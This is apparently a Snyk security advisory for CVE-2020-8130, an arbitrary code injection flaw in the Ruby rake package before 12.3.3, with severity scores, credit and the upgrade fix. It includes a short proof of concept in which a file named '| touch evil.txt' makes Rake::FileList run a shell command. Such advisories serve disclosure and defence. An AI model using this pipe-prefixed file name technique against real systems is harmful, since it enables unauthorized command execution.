Homepage
About Snyk

Arbitrary Code Injection Affecting rake package, versions <12.3.3

0.0
high

Snyk CVSS

    Attack Complexity Low

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.09% (36th percentile)
Expand this section
NVD
6.4 medium
Expand this section
SUSE
5 medium
Expand this section
Red Hat
6.4 medium

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-RUBY-RAKE-552000
  • published 24 Feb 2020
  • disclosed 24 Feb 2020
  • credit Katsuhiko Yoshida
Report a new vulnerability Found a mistake?

Introduced: 24 Feb 2020

CVE-2020-8130 Open this link in a new tab
CWE-94 Open this link in a new tab

How to fix?

Upgrade rake to version 12.3.3 or higher.

Overview

rake is a Make-like program implemented in Ruby.

Affected versions of this package are vulnerable to Arbitrary Code Injection in Rake::FileList when supplying a filename that begins with the pipe character |.

PoC by Katsuhiko Yoshida 

% ls -1
Gemfile
Gemfile.lock
poc_rake.rb
vendor
| touch evil.txt
% bundle exec ruby poc_rake.rb
["poc_rake.rb", "Gemfile", "Gemfile.lock", "| touch evil.txt", "vendor"]
poc_rake.rb:6:list.egrep(/something/)
Error while processing 'vendor': Is a directory @ io_fillbuf - fd:7 vendor
% ls -1
Gemfile
Gemfile.lock
evil.txt
poc_rake.rb
vendor
| touch evil.txt

References